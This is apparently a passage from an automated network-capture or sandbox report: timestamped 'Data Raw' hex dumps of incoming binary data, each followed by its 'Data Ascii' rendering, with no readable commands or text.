                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4110INData Raw: 1e 54 9d 7a 40 55 70 0d fe 41 fa 29 de 72 6c f5 79 cc ed 71 31 45 79 08 53 b2 f0 b6 c0 49 1a 02 93 bd 7d 02 45 08 6b 28 5d d1 98 a0 6a cf af c5 61 03 9d d4 d7 17 5a ed 65 ea af 6b dd 3e 6a 32 ee 64 f2 59 39 de d5 05 6a 55 f5 4c 82 e5 81 97 c9 31 9d 40 7d 3f aa 79 d2 0b f4 71 7f 07 79 7f ef 4a 6f 6c cf d4 90 27 b6 56 9f 61 2d 0e e4 21 f6 5b bf 80 b0 28 7b df c0 f1 63 f7 1e b6 3d c0 8b e2 9c c8 71 30 6e 6c b6 da 26 46 39 25 f1 79 87 4a fb 7b 99 56 95 44 b6 9f d5 c2 a3 69 ff ef 97 43 42 7b ef 00 3c 2e ca c6 33 2d c1 86 2f db 2d b2 b1 74 a4 d2 7f 01 7d 0e 57 c3 4f ce c6 13 41 c4 c5 72 5a 8b f4 3d a5 27 c5 23 a9 26 5b 7d d6 0a 5a c3 32 c5 3b 86 2d 8c fd 0d db 58 39 3f 45 12 3e d8 0d db 9a c6 ab a0 97 c1 8f 32 78 55 c3 b3 b0 e6 c5 f7 a1 04 6f 72 7a 45 3d 3c 46
                                                                                                                                                                                                    Data Ascii: Tz@UpA)rlyq1EySI}Ek(]jaZek>j2dY9jUL1@}?yqyJol'Va-![({c=q0nl&F9%yJ{VDiCB{<.3-/-t}WOArZ='#&[}Z2;-X9?E>2xUorzE=<F
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4126INData Raw: 71 5d 06 b9 94 07 ba a1 64 6b 8c 37 e2 77 87 b2 d0 30 06 68 9c 8d 5f b4 b0 d0 c4 23 36 01 5c b8 eb 75 33 06 d5 57 9b 8a 20 8c e8 f8 d9 2e 20 3c 08 b3 06 18 2c 21 77 1b fd 8f a7 5d ca 75 92 c9 57 2e a9 a2 b1 09 00 56 70 96 25 3c 66 8a ec 3a 57 51 1e f8 94 12 2c ce a0 40 73 01 1c 3b 21 27 8c c6 71 20 8e 07 2f d1 13 71 3f 06 66 79 da 5f 07 f2 7e 50 a7 42 32 c5 ec a7 04 e1 bd a4 77 26 ba 99 06 6a 3b 1c 59 ee 75 e9 ac 17 45 be c7 8e c0 4e 32 4d e2 8d a9 67 b2 f4 53 45 f9 ab 64 eb d1 01 d9 02 6c d8 db 50 1e 8c a6 9a fe 0e 17 8e 1b 7f ac ac f5 81 35 1a c8 5d a9 df a4 a8 bd e3 09 65 2b 4a 51 30 c7 4c a4 98 b9 69 26 23 cb 51 e0 9e d6 72 5f d8 3a 19 a6 55 e6 53 3c b4 e7 70 18 19 76 1f 04 4d ae 3f 40 db 93 70 4b 0a 74 5e 48 57 37 1d d6 dd 2d 1d 35 10 98 fa f5 59 4a
                                                                                                                                                                                                    Data Ascii: q]dk7w0h_#6\u3W . <,!w]uW.Vp%<f:WQ,@s;!'q /q?fy_~PB2w&j;YuEN2MgSEdlP5]e+JQ0Li&#Qr_:US<pvM?@pKt^HW7-5YJ
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4142INData Raw: 99 df 9d a9 14 69 15 ec d4 d2 12 35 8c a3 22 d7 fc 4c 26 dd c9 12 ea 1b c0 c8 e2 d6 1a ef 6d c2 b1 ae 58 97 f3 4a da 62 39 a3 0a 02 0c f2 d2 e6 0c 35 6f 62 82 9c d1 ac 38 c4 de 2c 72 2a e1 4b 39 4b f4 e8 54 9d e6 47 b8 fe ad fe 89 eb c2 e0 b7 0f 6d d1 13 6e 1c b9 4c a3 d3 e6 ae 2f 0a c7 48 8c 08 a5 ed dd 4c 32 d4 65 8e 0e 45 74 c3 51 63 f1 3c ec 91 a7 c1 da 70 9c fa 28 38 f1 5b 56 bc 33 8f 06 dc ac 5f f9 85 94 14 91 50 ee 53 8b 32 86 c4 8a 62 11 bd 57 80 3b 6c 54 2f 51 cc bd 5f ac f9 da 1a ea 6d 8e 0c 10 ed 13 88 dd 63 d8 d5 cd 04 61 e3 a6 bf bf e9 6c ca 0e b2 d9 65 85 14 30 f3 f5 45 f6 70 02 dd 16 d7 40 87 49 9a 31 03 a8 d3 71 36 7f 35 b6 b7 05 9a 33 31 bf 05 a9 8a 9f 72 d6 8b 9c 1d ad 70 b5 10 06 f0 90 43 74 d6 3c ee 84 52 e4 b7 76 84 41 25 c0 0e 33 4e
                                                                                                                                                                                                    Data Ascii: i5"L&mXJb95ob8,r*K9KTGmnL/HL2eEtQc<p(8[V3_PS2bW;lT/Q_mcale0Ep@I1q6531rpCt<RvA%3N
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4158INData Raw: 90 cd bd 74 a9 e8 c1 b3 9a 52 b0 55 2a 06 32 59 81 60 4e 8c 68 8e bd cd 1e a6 e6 0e bd 2c 9a a9 ad 41 b1 18 7d b6 d1 ca b7 af e0 e0 06 01 4c de e6 a3 6a a9 50 e9 7b cd ce d6 bd d4 23 6e 26 e2 c5 2d 34 4b 8c d4 f2 56 a3 db a3 1b b1 44 19 9e 0a ce 8f e6 2a c0 bb df a3 f4 f0 1e 74 23 3f e4 2a 84 a3 28 55 95 09 26 ad 4f ff 1b 9e 46 7b a7 8e cc 45 10 5b 0e 38 a0 27 bf 13 93 7a 89 9f 31 43 af 7f 24 e1 b6 6d 0f 03 df 0f 1b 30 fb 52 4b d3 f9 69 7a b4 6b fe 09 26 43 1a 98 72 53 3d 55 70 00 44 38 cf 26 51 63 94 97 93 e2 a7 c0 2a 18 f4 c7 9d ab 72 d2 44 15 2f f3 f7 58 30 6c 45 34 fd 85 c7 ad 00 44 2a 62 c5 4b 05 d1 74 17 c2 e4 d7 0a f0 e4 11 4f ff 64 cd d3 5f 9f 36 f4 26 e1 55 af 08 10 5f 25 3e ed 1c 7c ed 82 a5 3e bd 51 10 1a 72 bd 15 63 a8 0e eb 35 59 62 79 29 c7
                                                                                                                                                                                                    Data Ascii: tRU*2Y`Nh,A}LjP{#n&-4KVD*t#?*(U&OF{E[8'z1C$m0RKizk&CrS=UpD8&Qc*rD/X0lE4D*bKtOd_6&U_%>|>Qrc5Yby)
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4174INData Raw: d5 d8 47 45 ca 84 8c 87 55 6a f5 49 f2 99 f0 c8 e9 61 09 f9 f5 e6 fb e0 3b bb 66 1e 17 ae 13 a4 c8 e8 a9 54 c7 f7 6a 58 ca 32 17 bc e2 9f 48 ac 92 2b 33 b9 4f 0e c1 90 ab a1 c9 95 5f 51 41 b0 bf 8e 5e e2 59 5a 34 4e 64 24 2d af f5 9d 75 d2 14 b7 0d 9a a5 66 1b 12 8d 0c 0c 45 f4 ee a4 23 4c 92 79 f1 67 03 6f ca f3 37 95 e7 38 07 76 0f 55 5c 98 76 6e 04 b1 4e ae 75 6e 14 42 73 97 40 60 bf 6b 06 6d 9f d2 7a 28 3e b0 70 22 7e 11 f0 3a cd c1 52 19 28 79 25 13 16 0b 2f b1 72 0c d8 a3 ee af 2b ba cd aa dd 06 cf d8 4e 04 ca c7 20 aa 7f a2 4a 3e d5 91 c1 3c 54 ea e1 b5 2a 1f e4 77 7a ca a2 71 95 da 01 bc 89 76 5f 45 af a0 08 50 f1 0a 2d 50 e5 81 7f 39 c6 85 5a 2f e7 dc 65 41 40 2b d6 1a e5 8f 4b 9c 92 8c aa 4b 9f 06 e4 e6 af 22 3f a1 05 18 79 17 83 e3 cd f8 2b 34
                                                                                                                                                                                                    Data Ascii: GEUjIa;fTjX2H+3O_QA^YZ4Nd$-ufE#Lygo78vU\vnNunBs@`kmz(>p"~:R(y%/r+N J><T*wzqv_EP-P9Z/eA@+KK"?y+4
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4190INData Raw: 70 93 17 14 40 dc a1 fc bd f8 c6 8a e3 e4 ee 56 f9 e7 5c 61 8c 82 63 ee 2b 5e dc 14 94 f6 c7 f8 77 46 7c f6 c2 50 d0 e2 9e ef 16 40 62 76 4a 1e 21 a3 75 b0 e8 ae 07 7c bb bd 86 ca 9c 76 aa 56 7a 8b 72 ba 6b cb 3a 6f 59 f1 92 b5 84 8e be 35 02 08 08 bf 57 9f 2f a5 f4 34 17 5e b1 2b 65 28 b2 46 b9 79 8f 4e 19 ad b8 fd 32 28 53 c4 9a 3f 37 1d c0 1e d3 2c 48 12 3a 59 14 07 ab b4 03 0d 01 e0 71 30 dd 3d 43 45 f4 02 ad e3 26 11 2f c0 d2 89 20 76 77 e5 81 e1 f9 eb 65 8d 31 8f 2f 59 11 00 ce 37 04 2a a1 02 c8 2c 72 16 71 d7 a3 4c 9e 88 30 84 bc d2 aa b2 da dc 16 21 ef 2f 1b 7c 95 92 16 01 3d 9a b8 08 eb 01 77 1e c6 23 a3 38 97 8e 7c 1d 99 2e c6 f2 d2 53 f8 e7 0f 68 4f b6 a1 42 e0 df d6 4f 77 f9 ac a4 73 3f 3e bc 20 3e d5 c9 b5 ec a6 17 78 c8 d5 a2 57 d3 0c bc 61
                                                                                                                                                                                                    Data Ascii: p@V\ac+^wF|P@bvJ!u|vVzrk:oY5W/4^+e(FyN2(S?7,H:Yq0=CE&/ vwe1/Y7*,rqL0!/|=w#8|.ShOBOws?> >xWa
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4206INData Raw: f9 9a ab ea dd f1 d4 ea 61 59 13 ca ad 6b fa 99 29 9e 7b 0b 3f d8 47 57 52 63 17 23 41 3b 51 4d 4c c6 ab 9d 10 b6 48 c3 8c 30 10 b8 2a 7f 68 05 30 da 06 d5 28 37 69 42 1c 62 2b cf 23 67 a2 27 43 29 a7 98 c8 32 7a cb a2 27 8a 79 78 df 39 7b f4 18 8f 58 a2 85 d7 92 f3 c8 5b 5d a4 5a 6c 8e 19 37 0c 05 24 c0 29 8a 20 29 67 19 b6 f9 74 62 e1 d5 a0 a6 52 d2 be 54 31 ff 44 7d 27 0b 01 51 8b 40 99 0c 9a c8 69 f2 81 1f 6d 19 6a 39 20 51 94 c4 a1 28 a3 c6 ee e2 cf 0f 82 d1 bd c5 4b ae b3 25 77 3d 1d 38 3e f0 2e 29 0a df 79 f8 93 8f 74 13 c6 a6 54 33 89 5c 60 1a df 2a c2 23 0a 9b bc 79 bc 06 56 a1 d7 e1 58 ae 4e ff 03 89 84 00 9d 7d 54 e6 71 c4 ff 9d cd 6f 45 fd ba e7 ec 5a b3 17 40 66 b7 89 0e 9a f0 43 6d 88 99 b7 0a c1 35 cc 1e eb 57 1d d1 90 92 24 0b 0a fd ab 48
                                                                                                                                                                                                    Data Ascii: aYk){?GWRc#A;QMLH0*h0(7iBb+#g'C)2z'yx9{X[]Zl7$) )gtbRT1D}'Q@imj9 Q(K%w=8>.)ytT3\`*#yVXN}TqoEZ@fCm5W$H
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4222INData Raw: 61 a8 03 e6 a5 a4 16 44 0c 0e 35 24 29 31 c6 68 ca ec 14 2b 3e ca 9f 67 df 2b 13 b1 62 e8 0a 77 ec 4c 3f 54 6b 55 f4 45 be 0f 31 63 c4 d9 b8 3d d1 07 92 61 73 16 c9 38 08 ea 54 14 1d c3 3c 00 be 66 ee 47 11 fb 6b e9 27 6c 73 80 0f 31 97 80 13 17 ce cf 8a f8 f0 ce 2c 13 44 d4 31 1c 9f 52 ce c6 44 ff 78 48 cc ac 2d a7 b7 d3 d9 47 6d 9c 06 26 2a fd f0 7a f8 80 91 47 fb dc 69 05 ef 56 c8 64 c8 7e 9d 3a 4f de e6 1b ef 9a a6 17 e1 6f 7c 49 7a 2f 96 5b 84 68 12 a6 0f ee e2 c8 a8 b6 c3 48 12 28 4a e7 0f 6c 2c e7 79 2b 7d ff 7c 7a 67 dc ff 2e b9 aa 63 43 f9 38 5d 0e 1b 6d 03 12 5b ca 72 c8 70 fb ee aa 1c b0 fe 51 26 e6 70 ba ad 1a c7 ed bc d2 65 c9 da 19 a3 ab 1a e3 a4 bc a0 8c a8 cd f6 b6 d4 78 62 1e 51 14 5c 44 a2 bc 3d 19 d3 3f 16 ce ec 20 90 01 10 03 7d 70 57
                                                                                                                                                                                                    Data Ascii: aD5$)1h+>g+bwL?TkUE1c=as8T<fGk'ls1,D1RDxH-Gm&*zGiVd~:Oo|Iz/[hH(Jl,y+}|zg.cC8]m[rpQ&pexbQ\D=? }pW
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4238INData Raw: 80 c5 fe 08 93 04 d3 24 00 d4 3d 70 67 29 70 29 ea aa 64 fc b0 81 47 e1 4b 8c fb 26 ef f2 b3 17 58 ae b2 ac 23 ec f3 be 38 48 0f ed b8 a8 6f 2d af 5a ac 1e 28 fa 84 7d 87 4c 22 e6 db 2f ea 4d a8 46 b4 38 61 0d 90 b7 4d 36 85 1d eb ef ce a4 c4 03 90 64 44 c0 fd 1c b1 8b d3 94 f5 f8 c3 d4 94 51 72 ed 9a e8 a2 b1 96 3d e4 fd 34 c2 d3 bf 29 24 b5 b6 1a aa 89 8e 49 61 c6 c4 e0 fc ec 6b 6b 14 41 21 dd 7f 18 d5 b4 2e bf cf 4a 2d 6d ec 8a ed 07 b0 2e b0 fa 52 84 13 72 66 f1 6f c0 d8 a8 e6 61 fe 8c 6a 00 be f1 a3 a3 4e e7 90 f0 f9 0d 7e aa eb 2c 31 03 95 93 ac 6f 6d ba d3 78 5d f1 5d 1b f2 4a 55 87 4e be 53 71 e2 2e e1 b8 3e 36 0f 8e bc ee 3b cb 1a 3c e3 e6 e6 cd 97 32 3d 99 2a 24 ae 50 e5 1c a4 66 c9 a3 30 bb 07 99 a7 fc 13 cd db 6a e8 ea cc 65 08 a5 82 a9 5d b9
                                                                                                                                                                                                    Data Ascii: $=pg)p)dGK&X#8Ho-Z(}L"/MF8aM6dDQr=4)$IakkA!.J-m.RrfoajN~,1omx]]JUNSq.>6;<2=*$Pf0je]
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4254INData Raw: cd a0 5e 86 d3 89 dc ec 77 5c 51 e4 6e 3c 31 7b 61 0f 04 15 e7 7a c2 d4 bc d0 af 10 c2 60 5d aa 1c 0d ce 33 1a 74 48 fc c9 68 46 04 85 dc d9 69 f8 4a b0 a6 bd 81 1b 28 b2 e8 6a ad 02 c1 8d d8 5c 0c 2d 23 2e a7 ee 45 f9 d7 72 47 27 f0 91 21 c5 f2 8d 1e ed 9e 52 78 da e2 77 ee 1f 65 91 e9 e5 10 03 c3 81 f4 78 01 a4 df da 78 e9 a9 a8 64 00 2e 77 6d 20 aa 52 a4 6b cf 39 f1 1b 7b ff 5b 19 b3 6a 25 ec e6 86 53 67 04 fb 06 c7 b4 ed 91 82 c8 a3 18 82 93 9b b6 47 16 03 ea 70 a2 00 69 3d 37 53 40 19 60 08 ff 8d bd 04 91 f4 bb 1b 61 35 9e 4e 75 0d 2b ba c9 a0 37 81 b1 8f ec fd 73 76 e1 a0 e4 04 20 eb 46 d4 67 1c 11 ba 96 73 1f 04 4e 14 bf 88 23 f8 3a 61 b5 ff a9 12 8c ad 8e 73 46 14 f9 44 3b 18 68 8e cb 73 60 d6 83 e8 64 83 b4 c3 24 38 6f 58 fb f8 9d 91 bd 05 ee bb
                                                                                                                                                                                                    Data Ascii: ^w\Qn<1{az`]3tHhFiJ(j\-#.ErG'!Rxwexxd.wm Rk9{[j%SgGpi=7S@`a5Nu+7sv FgsN#:asFD;hs`d$8oX
                                                                                                                                                                                                    2022-01-14 03:59:51 UTC4270INData Raw: 52 e8 0f af 13 d3 5c c3 83 87 c9 f7 a1 53 49 69 1a 45 f3 74 94 00 ba 40 70 1c a5 e3 48 c7 8f 33 d1 ff db 02 5b c1 f4 ee df 56 1b 7f 43 42 cf b3 03 35 2b f0 09 af 4a ba c1 b9 2b cd 26 cc cb bb 16 60 9f 1c 65 96 be a9 e5 35 c3 18 96 cf df 1b 01 96 2d 86 48 7f 76 99 b0 17 83 f9 bd b3 2c 09 f4 df 83 92 8d 7a ff 5f 91 f4 fa 10 5d 7a bf 98 33 43 4f 14 bf bf 7f 19 31 03 c2 84 36 fe b0 56 a6 a2 8d 0e 64 a3 18 dd 09 7d 08 f6 6d 66 e3 0e 22 3e d2 ff 38 05 c7 b5 3c 70 4f 96 17 9c 56 6c 3d e1 79 54 79 9d 09 ff d3 9b 3d b4 54 bd d5 e7 ff 4d 8c bc 93 f7 56 0b c8 ce 1a 1a 16 d5 49 37 ed ee d6 30 b5 51 3e 9c 40 d1 dc 9e b5 e4 5e 31 19 62 42 f9 f7 f5 2a 58 99 02 5f 97 9d 11 81 89 2d 36 73 37 51 95 95 57 c6 9c e6 7d 39 96 71 b2 6c fb d1 db 22 24 c8 cd a3 db b3 3c d1 a3 94
                                                                                                                                                                                                    Data Ascii: R\SIiEt@pH3[VCB5+J+&`e5-Hv,z_]z3CO16Vd}mf">8<pOVl=yTy=TMVI70Q>@^1bB*X_-6s7QW}9ql"$<
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4286INData Raw: 10 c2 44 82 65 81 dc f2 d3 fd 5c ac 7a c4 ea 66 47 7e 67 bc ac b3 bc c4 08 28 04 30 f2 6e 8b 48 3f c4 aa 46 2a 7d a4 09 5c 28 d1 5e 01 9c 74 bb 76 ea bc 01 51 8f 3b 67 f0 5a 65 27 2e af de 40 0c 3e 5f f3 3e 2c 4e 67 f9 6f 68 f1 91 01 82 6a db ac 05 d3 19 22 a8 6d 37 78 e7 57 a5 8b 85 c1 c0 ef 69 34 cc ca b6 91 02 79 c3 61 50 ea 46 3f b8 d2 61 69 7b 50 96 e9 55 a5 fd 7d 5e b8 2e 18 17 86 8d 93 61 ab ae f2 70 9d 77 6b a2 a2 76 b9 ed 3a e4 1f ef 0b fa 49 6c b5 5a 56 a1 75 26 8e 25 0f 8a 0e 0d cd 5e ad fe fd 6b 5c 7d b1 54 11 73 5a e2 65 ed bc f9 d7 bf f7 da ac ae f0 e1 81 1d 60 f0 be e2 20 19 6b 76 33 6a 07 2b e2 bb 83 da 21 f9 a1 78 88 e9 b1 57 35 4e 92 be 2c 0e bd 74 37 34 1a cc f6 86 c8 c6 ad 16 5c b0 2b ea b6 79 e3 a3 f4 03 9a a0 ea 18 d3 79 b3 64 16 1a
                                                                                                                                                                                                    Data Ascii: De\zfG~g(0nH?F*}\(^tvQ;gZe'.@>_>,Ngohj"m7xWi4yaPF?ai{PU}^.apwkv:IlZVu&%^k\}TsZe` kv3j+!xW5N,t74\+yyd
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4302INData Raw: b5 c0 84 42 f6 a1 5c 36 75 9d 0f e0 34 6a bd e9 aa bb e2 93 77 81 47 20 60 ba 69 5a 33 47 27 8d e2 f2 f9 fc f3 9b 7a 06 67 51 c7 87 fc dc 2f 00 44 fc 97 30 8c be e5 a1 97 98 cb 14 05 db c0 2c dc 0e 84 b7 42 8b ac d7 91 55 ae 16 74 52 e8 70 84 0a 94 dc 99 86 e5 bb 5c a3 ca 36 08 c6 1a a1 e0 9b fa e0 f9 ca ff 0c 58 9e d5 c2 4a 34 89 a7 58 d6 92 c1 8b fb ca 5c 8a 23 e1 8d 9d 8a f4 84 fa 1f 2e 8d 9a 6f 94 43 85 e2 85 d2 e9 99 53 c0 05 f5 06 aa c6 c2 41 16 54 ac af 46 a9 cb 87 e5 7d 2e 4d a3 44 f4 ad 1f d2 ac 15 5c 6a 14 f5 09 10 4c e4 00 76 9a 7a 12 92 3e a9 e6 14 be db be bd 7a 18 6a 93 f9 15 b8 bd c8 f0 d1 03 98 3f e8 a3 07 73 14 de 4c 60 8d 1c cf aa 2e 04 5c c2 16 e9 ef 1c 56 97 66 66 39 ad 66 0e 1b 42 21 20 1e 6b cd 62 b8 52 86 60 83 f1 c1 e2 f5 77 6f ab
                                                                                                                                                                                                    Data Ascii: B\6u4jwG `iZ3G'zgQ/D0,BUtRp\6XJ4X\#.oCSATF}.MD\jLvz>zj?sL`.\Vff9fB! kbR`wo
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4318INData Raw: 14 d7 ec e7 1b 6d f4 75 e7 ff 65 81 52 0b 78 96 98 95 d3 a1 70 6f 60 58 62 3c 51 67 eb b5 de 79 20 16 05 90 5f 23 2e f8 c1 82 a9 5d 2c 1e de 09 fc c0 43 5d 1c dc c9 6b 55 32 8d f0 4a d3 8f 8e 8e 0c 99 2e 6f 24 eb bc 19 c0 cc d7 ca ec fd 2e 31 72 cf 3d 6f 51 54 1e 06 2b fb a4 90 e7 64 9f c6 3d 8a 2e c4 c7 81 10 24 b9 9f 41 ed 3a 3d d2 3a e2 63 d4 1b 56 b9 44 70 0a e3 e8 fa a2 31 9c e4 3c 7d a3 a9 de 5a 7d a5 84 9a bb e9 4a f8 5f f5 91 19 92 e1 5e 49 bf 8f d9 2f 55 71 f2 17 99 58 17 48 3b 5a 70 b3 a1 0b 4d 6a ad 4a 29 7a f3 1a 55 58 e6 79 d7 a1 03 51 62 37 0b 19 cf 14 ca ca 0f 46 ca fa 6e 75 6e 06 ab e4 df a5 e6 99 75 5c e1 cf ff 56 8e e7 e0 3d 31 c2 cd a2 5c f6 b5 04 76 80 9d 19 29 cf d5 ff 54 cd a8 19 0d 16 55 42 2c 43 76 17 a9 c5 f2 4c fe 29 48 19 39 c8
                                                                                                                                                                                                    Data Ascii: mueRxpo`Xb<Qgy _#.],C]kU2J.o$.1r=oQT+d=.$A:=:cVDp1<}Z}J_^I/UqXH;ZpMjJ)zUXyQb7Fnunu\V=1\v)TUB,CvL)H9
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4334INData Raw: 39 3d de 0d 8a 3f 38 9b 38 2a 9f 49 ed 20 78 a0 83 bb 08 d3 2f 52 46 06 53 c1 e0 47 63 df f5 1c 39 45 37 b1 b3 4b 48 ee 5d 07 b1 67 30 3f 61 8a 16 96 dc 90 cd 6a 13 10 70 7f de c0 d1 29 86 cf a3 dc ed 6c 2d 57 d4 35 99 21 c0 fd d5 d7 60 7c 58 a3 dd 61 ac fb f1 a3 ee db 47 bb f6 f8 61 c2 a0 54 c1 55 44 9f 3a 0f 94 3b 60 0f f3 d5 0e 40 a7 e0 42 d1 61 55 49 a2 6d e6 36 d3 92 2f e2 c9 28 dd 4a ba b7 2f f0 69 cd 29 a8 c9 64 b0 72 7c 80 6b a9 b6 e3 39 48 82 60 a2 dc 3a 63 ce 5c 0b 0d 13 b5 f6 f1 1b 3a 3d e5 71 4e ae 14 bb 3b 80 ec 4e b8 27 3f 45 a5 b6 c9 32 25 94 bf eb 14 63 3e f9 b6 f7 28 84 b2 dc f2 72 5b 0d 2e 4b 59 3b db 99 4b f2 8c c7 9d 36 ed 4a 98 c8 aa 64 99 45 dd 0d be 2f 18 09 3a b7 86 17 e8 be 38 b1 b1 ad 19 ae 5e 77 3f 96 6b 24 68 5b 81 15 6d d9 46
                                                                                                                                                                                                    Data Ascii: 9=?88*I x/RFSGc9E7KH]g0?ajp)l-W5!`|XaGaTUD:;`@BaUIm6/(J/i)dr|k9H`:c\:=qN;N'?E2%c>(r[.KY;K6JdE/:8^w?k$h[mF
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4350INData Raw: 51 3c 26 2c a9 bc e4 b4 fd df e3 9a 39 1b 84 ed b2 01 20 be 8c 81 ad 56 72 09 8f 70 94 f1 12 e2 40 6b c6 6b f2 b4 f8 93 22 49 83 3f e8 dc 33 78 9b 43 a2 89 c3 b2 a9 79 72 1e d1 30 95 1c ec 13 2f 7c 14 34 45 8e 67 e7 42 6d 14 73 dd dd 70 d4 d3 50 70 bc 5e d6 55 b3 c2 df 00 bb c7 58 42 79 5d c6 8a 38 7c ce 6e 0c 4a 01 81 82 5b b8 3c 3d ef 23 4f 09 32 a8 34 44 17 1e ef e7 73 b7 b5 13 25 42 f1 ec 0f 74 68 7e 7c 2e ba 5f 52 a0 27 37 91 d1 37 59 09 b5 1a bf be ad 3f fb 48 c4 bd da 54 e5 e3 c2 49 cb 1a 17 ea 22 b1 88 ae c9 4f 30 3b 5f 1a 58 bd f1 87 cb bf 52 a9 10 f1 f2 ce ec a5 f1 0c 9c 77 73 e4 a4 be 5f 73 4e cd 37 b1 f8 46 b4 1f 17 02 41 d8 67 77 de 51 58 99 d1 03 df ce 89 02 d2 38 c0 2d 09 9d b1 ef e8 46 88 ab 1f 81 3a 5c 49 9c f0 8a 77 94 6e 96 67 0f 7d a0
                                                                                                                                                                                                    Data Ascii: Q<&,9 Vrp@kk"I?3xCyr0/|4EgBmspPp^UXBy]8|nJ[<=#O24Ds%Bth~|._R'77Y?HTI"O0;_XRws_sN7FAgwQX8-F:\Iwng}
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4366INData Raw: 6e bc db 3d cd 3a 99 7b 02 03 4c 5e 74 2a 9a aa 3d fd c3 b1 7f ac 32 ab a9 29 11 2c e3 c6 f2 f7 ad ed b5 ab 31 e9 7d f4 33 27 c8 78 1b 19 26 d0 18 66 cd ac cf 23 81 ef ca 5a 54 15 15 95 bb 34 86 1d 89 3a 61 c4 f7 dc cd b7 8e c6 38 a6 f1 28 46 dc b7 d0 ba 52 03 01 e3 e1 26 ac 80 4d 04 53 75 83 65 d5 d4 e1 22 12 a6 24 5b 2e b1 e8 2d ac 1a d1 1c 58 5a 92 da 9f 9c 79 6c 48 54 5c 02 32 56 15 5b ce ba 5b e3 4a cd 56 d0 c6 59 18 ee 8b 38 9b 12 03 3f 6f 21 9d c2 b8 cb 08 33 d2 60 d8 e6 ca ef 0f 94 d5 4e af 0b 32 09 56 84 65 8e 50 db f5 66 10 b9 25 e5 4e 4b 5c dc 5b 53 94 72 6a cf c2 6d 29 05 3e 75 31 ec ee a5 61 d0 2b 7a 00 1b 9a 3f a6 82 a3 ad 55 5e b6 a5 d8 a3 68 9b 7d 33 db 3a 0b e1 a3 bc ce 25 63 ba d2 4b 80 de 08 cd 3a 3f 11 d4 96 5e 84 6a f4 db 86 27 c8 bd
                                                                                                                                                                                                    Data Ascii: n=:{L^t*=2),1}3'x&f#ZT4:a8(FR&MSue"$[.-XZylHT\2V[[JVY8?o!3`N2VePf%NK\[Srjm)>u1a+z?U^h}3:%cK:?^j'
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4382INData Raw: 1c 34 22 b3 4e f4 53 de 8a 21 a5 96 1c e0 a5 4f bb 36 ce bc 27 34 11 6e 66 08 2b dd a4 08 af 10 2c 03 0f 2a db b7 e3 6a 14 da 31 d2 81 15 a6 9d 7a 2f da 3d 5d 4a 50 ba ab 52 1b 59 a5 04 07 41 3b a5 cb 10 0a d3 a9 64 a5 4b 30 6b 06 53 ff 2a ee 6d f4 34 c3 07 c0 ca 4e 14 6e 1e 87 6d 81 84 2a 9d c3 a1 77 ee a9 f0 f5 ad ed 8f 40 d4 33 8d 20 f7 d2 2a 7f 0a c8 72 c1 45 13 43 51 bb b0 04 f4 df 24 82 81 90 66 73 59 53 5a aa 88 41 f4 97 87 04 b9 75 e4 85 6f ec 64 7d 14 2f 37 68 4a ce 7b 31 c8 70 a0 3d 5f 0b f8 ed 8f e0 79 58 40 8e fc 55 ef be 95 34 16 80 17 a8 13 a5 8b 92 c6 7d 75 cb 4c 50 e1 8e dc bc b2 87 c5 a7 41 3f 68 34 23 23 56 02 03 f1 ef d5 7e 84 98 0b 18 6a 23 af 4c 3a b5 07 2d 9c bc 72 ea 2b 14 bd 22 a4 72 e0 da 6a c9 6c 99 38 8b 1f bc 67 2d 07 bf 1d fa
                                                                                                                                                                                                    Data Ascii: 4"NS!O6'4nf+,*j1z/=]JPRYA;dK0kS*m4Nnm*w@3 *rECQ$fsYSZAuod}/7hJ{1p=_yX@U4}uLPA?h4##V~j#L:-r+"rjl8g-
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC4398INData Raw: 0a 19 0b 51 35 f2 6c 47 56 51 0d bc 16 4a 73 34 9b 8f b3 7c 0e e8 57 d3 cf 5e 89 78 79 88 41 ad 40 d5 81 fa 20 85 99 2f 2e 3b 4c f6 7f dd c6 5b 1a 01 31 f9 98 85 ff 5f 54 cc 0c f8 1a 2a a6 0c 9b 04 8d 89 28 36 ea 00 f8 6a 43 fe 50 b2 79 60 c3 b0 df 9a a1 b4 25 4f b3 a2 83 aa 70 6d 55 72 1c 75 0e ef 5b 41 6d b6 ec 79 df 98 50 44 57 c6 19 27 fe 40 39 37 38 65 91 67 df 30 60 f2 9b ce 98 bd d6 db b5 73 d3 e1 17 ab 13 a0 f8 d2 1e c0 e2 68 c4 c3 a6 a3 4b d0 6b cd bf 19 04 06 8e 61 ad 4a 89 b1 1a dd 84 a6 5c cb fe 3e 24 bd ec b3 11 a5 de 55 bd 7e 80 13 5f bb e4 43 94 45 b1 92 f6 e0 89 fd 8e 82 fb a7 1d 46 76 6e cf dd 5f d2 e8 ba a8 23 d8 b7 d2 1d 08 09 7c cd d3 ca 40 78 7b 62 70 f8 c8 e0 7c e0 35 c2 38 8b df 87 19 a5 bc ee f5 f0 6d e8 29 dd e5 4c 0c b6 9a 74 cb
                                                                                                                                                                                                    Data Ascii: Q5lGVQJs4|W^xyA@ /.;L[1_T*(6jCPy`%OpmUru[AmyPDW'@978eg0`shKkaJ\>$U~_CEFvn_#|@x{bp|58m)Lt
